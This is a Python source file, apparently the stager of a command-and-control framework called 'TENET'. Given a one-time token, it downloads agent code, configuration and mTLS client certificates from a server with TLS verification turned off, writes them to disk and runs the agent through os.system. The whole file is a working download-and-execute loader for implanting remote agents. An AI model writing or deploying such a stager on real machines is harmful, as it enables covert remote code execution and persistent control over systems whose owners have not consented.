# stager.py
"""
TENET Python Stager
Minimal agent delivery mechanism using one-time tokens.

Usage:
    python stager.py <token>

    where <token> is generated by admin dashboard
"""

import sys
import json
import requests
import os

from pathlib import Path

# Configuration
SERVER_URL = "https://127.0.0.1"

agent_id = None


def download_agent(token):
    """Download agent code."""
    global agent_id

    print("[*] Downloading agent...")

    try:
        response = requests.get(
            f"{SERVER_URL}/stager/agent",
            params={"token": token},
            verify=False,
            timeout=10
        )

        if response.status_code != 200:
            print(f"[-] Failed to download agent: {response.status_code}")
            try:
                error_msg = response.json().get("error", "Unknown error")
            except Exception:
                error_msg = response.text

            print(f"[-] {error_msg}")
            return None

        data = response.json()

        agent_id = data["agent_id"]
        agent_code = data["agent"]

        print(f"[+] Downloaded agent: {agent_id}")

        return agent_code

    except Exception as e:
        print(f"[-] Download failed: {e}")
        return None


def download_config(token):
    """Download configuration."""
    print("[*] Downloading configuration...")

    try:
        response = requests.get(
            f"{SERVER_URL}/stager/config",
            params={"token": token},
            verify=False,
            timeout=10
        )

        if response.status_code != 200:
            print(f"[-] Failed to download config: {response.status_code}")
            try:
                error_msg = response.json().get("error", "Unknown error")
            except Exception:
                error_msg = response.text

            print(f"[-] {error_msg}")
            return None

        data = response.json()
        config = data["agent_conf"]

        print("[+] Downloaded configuration")

        return config

    except Exception as e:
        print(f"[-] Download failed: {e}")
        return None


def download_certs(token):
    """Download mTLS certificates."""
    print("[*] Downloading certificates...")

    try:
        response = requests.get(
            f"{SERVER_URL}/stager/certs",
            params={"token": token},
            verify=False,
            timeout=10
        )

        if response.status_code != 200:
            print(f"[-] Failed to download certs: {response.status_code}")
            try:
                error_msg = response.json().get("error", "Unknown error")
            except Exception:
                error_msg = response.text

            print(f"[-] {error_msg}")
            return None

        data = response.json()

        certs = {
            "crt": data["crt"],
            "key": data["key"],
            "ca_crt": data["ca_crt"]
        }

        print("[+] Downloaded certificates")

        return certs

    except Exception as e:
        print(f"[-] Download failed: {e}")
        return None


def write_files(agent_code, config, certs):
    """Write files to disk."""
    global agent_id

    print("[*] Writing files to disk...")

    try:
        # Create certificate directory
        cert_dir = Path(f"keys")
        cert_dir.mkdir(exist_ok=True)

        # Write agent file
        agent_file = f"Agent{agent_id}.py"
        agent_conf = f"Agent{agent_id}.conf"

        with open(agent_file, "w") as f:
            f.write(agent_code)

        print(f"[+] Wrote agent to {agent_file}")

        # Inject config into agent file
        with open(agent_conf, "a") as f:
            f.write(config)

        # Write certificates
        with open(cert_dir / f"agent{agent_id}.crt", "w") as f:
            f.write(certs["crt"])

        with open(cert_dir / f"agent{agent_id}.key", "w") as f:
            f.write(certs["key"])

        with open(cert_dir / "ca.crt", "w") as f:
            f.write(certs["ca_crt"])

        print(f"[+] Wrote certificates to {cert_dir}/")

        return agent_file

    except Exception as e:
        print(f"[-] Write failed: {e}")
        return None


def execute_agent(agent_file):
    """Execute agent."""
    print("[*] Executing agent...")

    try:
        os.system(f"python {agent_file}")
        return True

    except Exception as e:
        print(f"[-] Execution failed: {e}")
        return False


def deploy(token):
    """Full deployment flow."""
    print("[*] TENET Stager Starting")
    print(f"[*] Server: {SERVER_URL}")
    print()

    # Download everything
    agent_code = download_agent(token)

    if not agent_code:
        return False

    config = download_config(token)

    if not config:
        return False

    certs = download_certs(token)

    if not certs:
        return False

    print()

    # Write files
    agent_file = write_files(agent_code, config, certs)

    if not agent_file:
        return False

    print()

    # Execute
    return execute_agent(agent_file)


def main():
    """Main entry point."""
    if len(sys.argv) < 2:
        print("Usage: python stager.py <token>")
        print()
        print("Example:")
        print("  python stager.py eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9...")
        sys.exit(1)

    token = sys.argv[1]

    success = deploy(token)

    if success:
        print("\n[+] Deployment complete!")
        sys.exit(0)

    print("\n[-] Deployment failed!")
    sys.exit(1)


if __name__ == "__main__":
    main()